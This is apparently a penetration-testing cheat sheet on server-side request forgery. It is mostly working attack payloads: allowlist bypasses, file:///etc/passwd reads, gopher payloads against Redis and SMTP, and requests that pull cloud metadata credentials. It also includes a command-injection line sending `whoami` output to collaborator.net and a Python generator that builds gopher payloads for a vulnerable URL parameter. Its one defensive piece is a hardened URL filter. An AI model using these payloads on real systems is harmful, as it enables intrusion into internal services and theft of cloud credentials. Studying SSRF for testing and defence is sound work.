A Server-Side Request Forgery (SSRF) vulnerability occurs when an attacker induces a server-side application to make a request to a destination of the attacker's choosing. Because the request originates from the server, it can reach internal services, cloud metadata endpoints and local files that are not exposed to the attacker directly, and it is not limited to HTTP: whatever URL schemes the server's fetching library supports are in scope.

Capturing SSRF Interactions

The first step is to confirm that the server really makes the request: point the payload at a listener you control, use a unique token per payload so you can tell which one fired, and record the callback (source IP, User-Agent and headers identify the component doing the fetching). Use tools such as:

Whitelisted Domain Bypasses

When the target only fetches URLs on an allowlisted host, the goal is a URL that passes the string check but connects somewhere else. Common bypass techniques:
# Open redirect chain (the allowlisted host is fetched, then the client follows its redirect)
https://victim.com/redirect?url=http://169.254.169.254/

# Using @ in URL (everything before @ is userinfo; the real host comes after it)
http://<whitelisted-host>@<attacker-host>/

# IPv6 loopback
http://[::1]:80/

# Decimal IP encoding
http://2130706433/  (127.0.0.1)

# Octal encoding
http://0177.0.0.1/  (127.0.0.1)
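As an added example (not from the original page), the Python below shows why these payloads pass a naive substring allowlist and how a hardened filter should parse the URL instead: reject userinfo, normalise IP literals through the same lenient inet_aton parser HTTP clients use (so decimal and octal forms collapse to 127.0.0.1), and classify the resulting address. The allowlist containing only victim.com is an assumption for the demo.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

# Assumed allowlist for the demo: the page's victim.com is the only permitted host.
ALLOWED_HOSTS = {"victim.com"}
ALLOWED_SCHEMES = {"http", "https"}


def naive_is_allowed(url: str) -> bool:
    """The kind of check the bypasses above defeat: a substring test on the raw URL."""
    return "victim.com" in url


def ipv4_from_lenient_literal(host: str):
    """Return an IPv4Address if `host` is anything inet_aton accepts (dotted decimal,
    octal 0177.0.0.1, hex 0x7f.0.0.1, or a bare integer 2130706433), else None.
    inet_aton is the same lenient parser most HTTP clients use, so normalising through
    it tells you where the server will really connect."""
    try:
        return ipaddress.IPv4Address(socket.inet_aton(host))
    except OSError:
        return None


def classify_destination(url: str) -> str:
    """Parse the URL the way a hardened SSRF filter should. Returns 'ok' or the reason
    for rejection. The open-redirect payload still comes back 'ok': this check must be
    re-run on every redirect hop, or redirects must be disabled in the client."""
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return f"rejected: scheme {parts.scheme!r}"
    if parts.username is not None or parts.password is not None:
        # http://victim.com@evil.com/ : victim.com is userinfo, evil.com is the host
        return "rejected: userinfo (@) in authority"
    host = parts.hostname  # lower-cased, IPv6 brackets stripped
    if not host:
        return "rejected: empty host"
    ip = ipv4_from_lenient_literal(host)
    if ip is None:
        try:
            ip = ipaddress.ip_address(host)  # [::1], ::ffff:7f00:1, ...
        except ValueError:
            ip = None
    if ip is not None:
        if ip.version == 6 and ip.ipv4_mapped is not None:
            ip = ip.ipv4_mapped  # ::ffff:127.0.0.1 is still loopback
        if not ip.is_global:
            return f"rejected: non-public address {ip}"
        return f"rejected: IP literal {ip} not in allowlist"
    if host not in ALLOWED_HOSTS:
        return f"rejected: host {host!r} not in allowlist"
    return "ok"


if __name__ == "__main__":
    for u in (
        "https://victim.com/redirect?url=http://169.254.169.254/",
        "http://victim.com@evil.com/",
        "http://[::1]:80/",
        "http://2130706433/",
        "http://0177.0.0.1/",
        "file:///etc/passwd",
    ):
        print(f"{u:60} naive={naive_is_allowed(u)!s:5} hardened={classify_destination(u)}")
```

Resolving a hostname to an address and checking the address before connecting closes the remaining gap (DNS names that point at internal ranges), but the resolution used for the check and the one used for the connection must be the same, otherwise a short-TTL rebinding between the two defeats it.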

Supported Protocols

Which schemes work depends on the fetching library (curl-based clients such as PHP's curl support most of the following), so probe each one.

file:// - read local files directly:
file:///etc/passwd
file:///C:/Windows/System32/drivers/etc/hosts

dict:// - talk to DICT servers; because banners and errors are echoed back, it also doubles as a TCP port scanner:
dict://<host>:<port>/d:<word>:<database>:<n>

gopher:// - send arbitrary TCP bytes to any service. The character after the `/` is the gopher item type and is not sent; everything after it is percent-decoded and written to the socket verbatim, CRLFs included. Useful for attacking Redis, SMTP and internal APIs:
# Gopher SMTP (note the double-encoded CRLF, %250d%250a: the web app decodes one layer, its gopher client decodes the other)
ssrf.php?url=gopher://127.0.0.1:25/xHELO%20localhost%250d%250aMAIL%20FROM%3A...

# Gopher HTTP
gopher://<server>:8080/_GET / HTTP/1.0%0A%0A
gopher://<server>:8080/_POST%20/x%20HTTP/1.0%0ACookie: eatme%0A%0Abody

Use Gopherus to generate Gopher payloads for:
  • MySQL, PostgreSQL, FastCGI, Redis, Zabbix, Memcache

Other schemes the client may accept, useful for checking which handlers are enabled and for reaching non-HTTP ports:
sftp://generic.com:11111/
ssrf.php?url=tftp://generic.com:12346/TESTUDPPACKET
ldap://localhost:11211/%0astats%0aquit   # 11211 is memcached's default port; the line feeds smuggle commands to it

SSRF via Special Headers

# Referer header (analytics and link-preview tools often fetch the URL found in Referer)
Referer: http://169.254.169.254/latest/meta-data/

# SNI field (a TLS proxy, e.g. a misconfigured Nginx stream proxy, that routes on the ServerName value without validating it)
openssl s_client -connect target.com:443 -servername "internal.host.com" -crlf

SSRF via TLS AIA CA Issuers (Java mTLS)

Some TLS stacks auto-download missing intermediate CAs using the Authority Information Access (AIA) → CA Issuers URI inside the peer certificate. In Java this behaviour is off by default; when a server runs with -Dcom.sun.security.enableAIAcaIssuers=true and requests client certificates, the PKIX path builder dereferences whatever URI the client placed in its certificate during the TLS handshake, before any HTTP logic runs, so no application-layer filter ever sees the request.
# Trigger SSRF via crafted client certificate AIA field
curl https://mtls-server:8444 \
  --key client-aia-key.pem \
  --cert client-aia-localhost-cert.pem \
  --cacert ca-cert.pem
# Server will fetch: http://localhost:8080 (the attacker-controlled URL in the certificate's AIA CA Issuers field)

# DoS via file://
# Setting AIA CA Issuers to file:///dev/urandom makes Java read unbounded bytes while trying to parse a certificate

Misconfigured Proxy SSRF

Proxies that build the upstream URL by appending the incoming request-target to a fixed base are a parser-differential problem: the characters below are harmless to the web framework but change the host for the HTTP client that finally connects.
# Flask proxy (@-based bypass: the configured upstream host becomes userinfo and evildomain.com becomes the host)
GET @evildomain.com/ HTTP/1.1
Host: target.com

# Spring Boot (;-based bypass)
GET ;@evil.com/url HTTP/1.1
Host: target.com

# Reverse proxy accepting absolute-form request-targets (acts as an open forward proxy; the Host header is ignored)
GET http://127.0.0.1:8080/ HTTP/1.1
Host: whatever
Connection: close

Cloud SSRF Exploitation

In cloud environments, SSRF can reach the instance metadata service, which hands out the instance's configuration and temporary credentials:
# AWS (IMDSv1). IMDSv2 first requires a PUT to /latest/api/token with an X-aws-ec2-metadata-token-ttl-seconds header and then that token in X-aws-ec2-metadata-token, so a GET-only SSRF fails against IMDSv2-only instances.
http://169.254.169.254/latest/meta-data/
http://169.254.169.254/latest/meta-data/iam/security-credentials/

# GCP
http://metadata.google.internal/computeMetadata/v1/
# (requires the header Metadata-Flavor: Google, e.g. injected via Gopher)

# Azure
http://169.254.169.254/metadata/instance?api-version=2021-02-01
# (requires the header Metadata: true)
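The gopher payloads in the protocols section and the header requirement for GCP above are the same problem: getting exact bytes, including CRLFs and custom headers, through a URL parameter. The Python below is an added example, not code from the original page or from Gopherus, that builds such payloads: a gopher:// wrapper, a raw HTTP/1.0 request serialiser (used here for the GCP metadata request with its Metadata-Flavor header), a Redis RESP encoder, and the second percent-encoding layer needed when the gopher URL is itself the value of a ?url= parameter (the parameter name is assumed).

```python
from urllib.parse import quote


def gopher_url(host: str, port: int, payload: bytes) -> str:
    """Wrap raw bytes in a gopher:// URL. The first character after '/' is the gopher
    item type ('_' here) and is not sent; everything after it is percent-decoded by the
    client and written to the socket verbatim, CRLFs included."""
    return f"gopher://{host}:{port}/_{quote(payload, safe='')}"


def http_request_bytes(method, path, headers=None, body=b""):
    """Serialise a minimal HTTP/1.0 request. HTTP/1.0 plus Connection: close makes the
    target close the socket after one response, so the SSRF client returns instead of
    hanging; CRLF line endings keep strict servers happy."""
    lines = [f"{method} {path} HTTP/1.0"]
    for name, value in (headers or {}).items():
        lines.append(f"{name}: {value}")
    lines.append("Connection: close")
    if body:
        lines.append(f"Content-Length: {len(body)}")
    return ("\r\n".join(lines) + "\r\n\r\n").encode() + body


def redis_resp(*args: str) -> bytes:
    """Encode one Redis command in RESP array form (what redis-cli sends). Inline
    commands also work, but RESP survives arguments that contain spaces or newlines."""
    out = [f"*{len(args)}\r\n".encode()]
    for arg in args:
        raw = arg.encode()
        out.append(f"${len(raw)}\r\n".encode() + raw + b"\r\n")
    return b"".join(out)


def nest_in_query(param: str, inner_url: str) -> str:
    """Encode the gopher URL once more for use as the value of an HTTP query parameter.
    This second layer is why the SMTP payload in the protocols section shows %250d%250a:
    the web app decodes one layer, its gopher client decodes the other."""
    return f"{param}={quote(inner_url, safe='')}"


def gcp_metadata_payload(param: str = "url") -> str:
    """GCP metadata request carrying the mandatory Metadata-Flavor header, ready to drop
    into a vulnerable ?url= parameter (parameter name assumed)."""
    req = http_request_bytes(
        "GET",
        "/computeMetadata/v1/",
        {"Host": "metadata.google.internal", "Metadata-Flavor": "Google"},
    )
    return nest_in_query(param, gopher_url("metadata.google.internal", 80, req))


def redis_probe_payload(param: str = "url") -> str:
    """Two RESP commands back to back: INFO to fingerprint the instance, QUIT so the
    server closes the connection and the SSRF client returns promptly."""
    payload = redis_resp("INFO", "server") + redis_resp("QUIT")
    return nest_in_query(param, gopher_url("127.0.0.1", 6379, payload))


if __name__ == "__main__":
    print(gcp_metadata_payload())
    print(redis_probe_payload())
```

If the vulnerable parameter is decoded only once (for example when you inject into a JSON body rather than a query string), drop nest_in_query and send the gopher_url() output as-is; sending a double-encoded payload to a single-decoding client leaves literal %0D%0A in the stream and the target will reject the request.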

Blind SSRF

When you cannot see the response, side channels remain:
Check the timing of server responses to determine whether a resource exists:
  • A live host with an open port answers quickly and a closed port is refused almost immediately, while a filtered port or a non-routable address hangs until the client's timeout.
  • Use these timing differences, together with any status code or error message the application returns, to map internal hosts and ports.

HTML-to-PDF Renderers as Blind SSRF Gadgets

Libraries like TCPDF and html2pdf fetch every URL referenced in the HTML they render (images, stylesheets, iframes), so attacker-supplied HTML becomes a blind SSRF gadget:
<html>
  <body>
    <img width="1" height="1" src="http://127.0.0.1:8080/healthz">
    <link rel="stylesheet" type="text/css" href="http://10.0.0.5/admin" />
  </body>
</html>

DNS Rebinding CORS/SOP Bypass

DNS rebinding lets an attacker's page read responses from services on the victim's local network without violating CORS/SOP: the origin (the attacker's hostname) never changes, only the address it resolves to.
  1. Victim visits the attacker's page, served from an attacker-controlled hostname with a DNS TTL of 0
  2. Attacker rebinds that hostname to the internal IP (loopback or a private address)
  3. Subsequent requests from the victim's browser to the same hostname reach the internal service, and the page's JavaScript can read the responses as same-origin
  4. Content is exfiltrated to the attacker
Tool: Singularity of Origin

SSRF to RCE Chains

# SSRF + command injection: the URL is handed to a shell (e.g. system("curl ...")), so shell metacharacters in it execute
url=http://collaborator.net?`whoami`

# SSRF via PDF rendering
# Renderers that execute JavaScript let injected scripts issue requests and write the responses into the generated PDF

Tools
